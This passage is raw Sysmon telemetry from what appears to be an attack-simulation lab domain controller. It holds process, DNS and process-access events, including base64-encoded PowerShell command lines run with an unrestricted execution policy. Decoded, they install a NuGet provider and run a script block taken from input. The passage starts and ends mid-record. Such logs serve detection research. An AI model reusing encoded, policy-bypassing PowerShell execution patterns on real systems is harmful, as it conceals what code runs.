c8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64) 154100x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.461{D28789B6-7CAE-5FA1-B300-000000008801}1356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\4j4ssjqy\4j4ssjqy.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG4AcwB0AGEAbABsAC0AUABhAGMAawBhAGcAZQBQAHIAbwB2AGkAZABlAHIAIAAtAE4AYQBtAGUAIABOAHUARwBlAHQAIAAtAE0AaQBuAGkAbQB1AG0AVgBlAHIAcwBpAG8AbgAgADIALgA4AC4ANQAuADIAMAAxACAALQBGAG8AcgBjAGUA 11241100x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4j4ssjqy\4j4ssjqy.cmdline2020-11-03 15:52:14.448 11241100x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:14.448{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4j4ssjqy\4j4ssjqy.dll2020-11-03 15:52:14.448 354300x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.657{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50318-false152.199.19.161-443https 22542200x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.298{D28789B6-7CAD-5FA1-B200-000000008801}652onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:15.763{D28789B6-7CAD-5FA1-B200-000000008801}652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Program Files\PackageManagement\ProviderAssemblies\nuget\2.8.5.208\Microsoft.PackageManagement.NuGetProvider.dll2020-11-03 15:52:15.763 10341000x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB0-5FA1-BB00-000000008801}1592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CB0-5FA1-BB00-000000008801}1592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7CB0-5FA1-B900-000000008801}43485092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CB0-5FA1-BB00-000000008801}1592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DC9FB68F) 154100x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.993{D28789B6-7CB0-5FA1-BB00-000000008801}1592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\rsgf2fl5.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.985{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\rsgf2fl5.cmdline2020-11-03 15:52:16.985 11241100x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:16.985{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\rsgf2fl5.dll2020-11-03 15:52:16.985 10341000x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB0-5FA1-BA00-000000008801}2720C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:16.531{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 